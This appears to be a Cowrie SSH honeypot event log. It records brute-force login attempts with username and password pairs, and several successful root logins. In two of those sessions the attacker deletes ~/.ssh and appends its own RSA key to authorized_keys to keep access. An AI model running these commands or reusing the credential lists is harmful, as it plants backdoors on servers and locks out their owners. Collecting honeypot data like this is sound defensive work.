{"eventid":"cowrie.login.success","username":"root","password":"L@y3rh0st2024","message":"login attempt [root/L@y3rh0st2024] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:28:39.872806Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:28:40.054056Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.054774Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.055478Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.139838Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:28:40.363792Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.364527Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.450833Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.452047Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38072,"dst_ip":"1.2.3.4","dst_port":22,"session":"0382bb4a4117","protocol":"ssh","message":"New connection: 212.227.235.229:38072 (1.2.3.4:22) [session: 0382bb4a4117]","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.533154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.534164Z","src_ip":"212.227.235.229","session":"0382bb4a4117"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.616794Z","src_ip":"212.227.235.229","session":"0382bb4a4117"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:40.989043Z","src_ip":"212.227.235.229","session":"0382bb4a4117"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.074682Z","src_ip":"212.227.235.229","session":"0382bb4a4117"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38086,"dst_ip":"1.2.3.4","dst_port":22,"session":"b51750368668","protocol":"ssh","message":"New connection: 212.227.235.229:38086 (1.2.3.4:22) [session: b51750368668]","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.157091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.159504Z","src_ip":"212.227.235.229","session":"b51750368668"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.241226Z","src_ip":"212.227.235.229","session":"b51750368668"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.570183Z","src_ip":"212.227.235.229","session":"b51750368668"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.653999Z","src_ip":"212.227.235.229","session":"8508783fc89d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:42.655231Z","src_ip":"212.227.235.229","session":"b51750368668"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"15.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 15.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:45.669390Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.session.closed","duration":"114.3","message":"Connection lost after 114.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:45.670691Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52064,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d2a3e4335b6","protocol":"ssh","message":"New connection: 212.227.235.229:52064 (1.2.3.4:22) [session: 9d2a3e4335b6]","sensor":"my-vps","timestamp":"2025-08-31T05:28:46.772033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:46.773061Z","src_ip":"212.227.235.229","session":"9d2a3e4335b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:47.039908Z","src_ip":"212.227.235.229","session":"9d2a3e4335b6"}
{"eventid":"cowrie.login.failed","username":"roger","password":"1234","message":"login attempt [roger/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:48.112999Z","src_ip":"212.227.235.229","session":"9d2a3e4335b6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:49.385968Z","src_ip":"212.227.235.229","session":"9d2a3e4335b6"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:51.431294Z","src_ip":"212.227.125.160","session":"4c31d9d09dbb"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":43124,"dst_ip":"1.2.3.4","dst_port":22,"session":"a06a1b623ded","protocol":"ssh","message":"New connection: 170.64.166.123:43124 (1.2.3.4:22) [session: a06a1b623ded]","sensor":"my-vps","timestamp":"2025-08-31T05:28:55.477006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:28:55.477984Z","src_ip":"170.64.166.123","session":"a06a1b623ded"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:28:55.753566Z","src_ip":"170.64.166.123","session":"a06a1b623ded"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456@12345","message":"login attempt [admin/123456@12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:28:56.895478Z","src_ip":"170.64.166.123","session":"a06a1b623ded"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:28:58.173159Z","src_ip":"170.64.166.123","session":"a06a1b623ded"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39844,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e1abfffac2b","protocol":"ssh","message":"New connection: 212.227.125.160:39844 (1.2.3.4:22) [session: 2e1abfffac2b]","sensor":"my-vps","timestamp":"2025-08-31T05:28:58.373499Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42268,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a96b82d738e","protocol":"ssh","message":"New connection: 212.227.235.229:42268 (1.2.3.4:22) [session: 4a96b82d738e]","sensor":"my-vps","timestamp":"2025-08-31T05:29:04.307562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:29:04.996674Z","src_ip":"212.227.235.229","session":"4a96b82d738e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:29:04.997464Z","src_ip":"212.227.235.229","session":"4a96b82d738e"}
{"eventid":"cowrie.session.closed","duration":"71.8","message":"Connection lost after 71.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:05.865598Z","src_ip":"212.227.125.160","session":"4c31d9d09dbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42128,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fbddb7c7d58","protocol":"ssh","message":"New connection: 212.227.235.229:42128 (1.2.3.4:22) [session: 4fbddb7c7d58]","sensor":"my-vps","timestamp":"2025-08-31T05:29:09.866890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:29:09.867553Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:29:10.142377Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:29:11.002235Z","src_ip":"212.227.235.229","session":"4a96b82d738e"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4.","message":"login attempt [root/Q1w2e3r4.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:29:11.281295Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49194,"dst_ip":"1.2.3.4","dst_port":22,"session":"5365840746c0","protocol":"ssh","message":"New connection: 212.227.125.160:49194 (1.2.3.4:22) [session: 5365840746c0]","sensor":"my-vps","timestamp":"2025-08-31T05:29:11.516187Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:29:11.846580Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:29:11.847340Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:29:11.848435Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:12.124360Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:29:12.269717Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:29:12.270486Z","src_ip":"212.227.125.160","session":"5365840746c0"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:29:12.711844Z","src_ip":"212.227.235.229","session":"4a96b82d738e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:29:13.183525Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:29:13.184297Z","src_ip":"212.227.235.229","session":"4fbddb7c7d58"}
